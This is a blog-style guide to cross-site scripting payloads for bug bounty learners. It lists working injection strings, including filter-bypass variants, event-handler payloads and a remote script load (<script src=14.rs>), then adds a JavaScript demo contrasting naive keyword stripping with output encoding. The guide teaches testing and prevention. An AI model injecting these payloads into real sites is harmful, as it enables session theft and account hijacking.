XSS Payloads Guide: Simple Overview & Examples

by x32x01
If you're getting into web security or bug bounty hunting, you’ll definitely run into something called XSS (Cross-Site Scripting). It’s one of the most common web vulnerabilities - and understanding how it works is a big step toward becoming a skilled tester 🔐
In this guide, you’ll get a clear, simple overview of XSS payloads, how they work, and where they’re used - without unnecessary complexity.

What Is XSS (Cross-Site Scripting)?

XSS is a vulnerability that allows attackers to inject malicious scripts into web pages viewed by other users.
💡 In simple terms:
  • The attacker sends JavaScript code
  • The website executes it inside the victim’s browser
🎯 This can lead to:
  • Cookie/session theft
  • Account hijacking
  • Redirects to malicious sites



Basic XSS Payloads

These are the simplest forms of XSS, often used to test if a website is vulnerable.
HTML:
<script>alert('XSS')</script>
📌 If this runs, the site is vulnerable.

Variations to Bypass Filters

Attackers often try to bypass filters using tricks like:
HTML:
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
💡 These techniques help bypass weak security filters.



XSS Using Image Tags

Sometimes <script> tags are blocked. That’s where image-based payloads come in.
HTML:
<img src=x onerror=alert('XSS');>
📌 The onerror event triggers when the image fails to load.

Advanced Variants

HTML:
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
🚀 These are used to bypass filters or WAFs.



SVG-Based XSS Payloads

SVG elements can also execute JavaScript:
HTML:
<svg onload=alert(1)>

More Examples

HTML:
<svg/onload=alert('XSS')>
<svg id=alert(1) onload=eval(id)>
💡 SVG payloads are powerful because they often bypass traditional filters.



HTML5 XSS Payloads

Modern HTML5 features introduce new attack surfaces:
HTML:
<input autofocus onfocus=alert(1)>
<video src=_ onloadstart="alert(1)">
<details open ontoggle="alert(1)">
📌 These rely on user interaction or auto-triggered events.

Touch-Based Payloads (Mobile)

HTML:
<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
📱 Useful when testing mobile-based interactions.



External Script Injection

Instead of injecting code directly, attackers can load external scripts:
HTML:
<script src=14.rs></script>
💡 This allows loading custom payloads remotely.



XSS via META Tag

META refresh can be abused to execute JavaScript:
HTML:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,...">

With Redirect Trick

HTML:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
🚨 This technique can redirect users to malicious code.



XSS in Hidden Inputs

Even hidden fields can be exploited:
HTML:
<input type="hidden" accesskey="X" onclick="alert(1)">
📌 Trigger using keyboard shortcuts like: CTRL + SHIFT + X



DOM-Based XSS

This type happens entirely on the client side:
HTML:
#"><img src=/ onerror=alert(2)>
💡 It manipulates the DOM without server involvement.



XSS in JavaScript Context

Sometimes you inject payloads inside JavaScript itself:
JavaScript:
-(confirm)(document.domain)//
; alert(1);//
📌 Useful when quotes are filtered.



XSS via URL Injection

XSS can also be triggered directly from the URL:
HTML:
URL/<svg onload=alert(1)>
URL/<input autofocus onfocus=alert(1)>
🌐 This is often used in reflected XSS testing.



Important Notes for Ethical Hackers

Before you start testing:
  • ✅ Always test on authorized targets only
  • ❌ Never exploit real users
  • ⚖️ Follow bug bounty program rules



Final Thoughts

Understanding XSS payloads is essential if you want to get into penetration testing or bug bounty hunting.
Start simple, then explore advanced techniques. Over time, you’ll learn how to:
  • Detect vulnerabilities
  • Bypass filters
  • Secure web applications
🔐 The goal isn’t just exploitation - it’s understanding and prevention
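
Added example (not part of the original post): why the nested-keyword payloads under "Variations to Bypass Filters" and "Advanced Variants" get past a filter that deletes keywords, and why output encoding neutralizes them. `naiveStrip`, `escapeHtml`, `stillActive` and `compare` are hypothetical helpers written for this illustration; the sample strings are payloads already shown above.

```javascript
// Hypothetical weak filter: a single pass that deletes "<script>",
// "</script>" and the word "onerror" wherever they appear.
function naiveStrip(input) {
  return input.replace(/<\/?script>|onerror/gi, '');
}

// Defensive alternative for HTML text and quoted-attribute contexts:
// encode the markup-significant characters instead of deleting keywords.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Crude check used only for this demo: does the output still contain a
// <script> tag or a tag carrying an on* event-handler attribute?
function stillActive(html) {
  return /<script\b|<\w+[^>]*\son\w+\s*=/i.test(html);
}

// Payloads copied from the sections above.
const SAMPLES = [
  "<scr<script>ipt>alert('XSS')</scr<script>ipt>",
  "<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>",
  "<svg onload=alert(1)>",
];

// Run each sample through both approaches and record the outcome.
function compare(samples) {
  return samples.map((s) => ({
    input: s,
    stripped: naiveStrip(s),
    strippedActive: stillActive(naiveStrip(s)),
    escaped: escapeHtml(s),
    escapedActive: stillActive(escapeHtml(s)),
  }));
}

for (const row of compare(SAMPLES)) console.log(row);
```

Deleting the inner keyword reassembles the outer one, and the blocklist never covered `onload` at all; encoding leaves nothing for the HTML parser to treat as a tag. `escapeHtml` only covers HTML text and quoted attributes, so values placed inside a script block or a URL need encoding appropriate to that context.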
 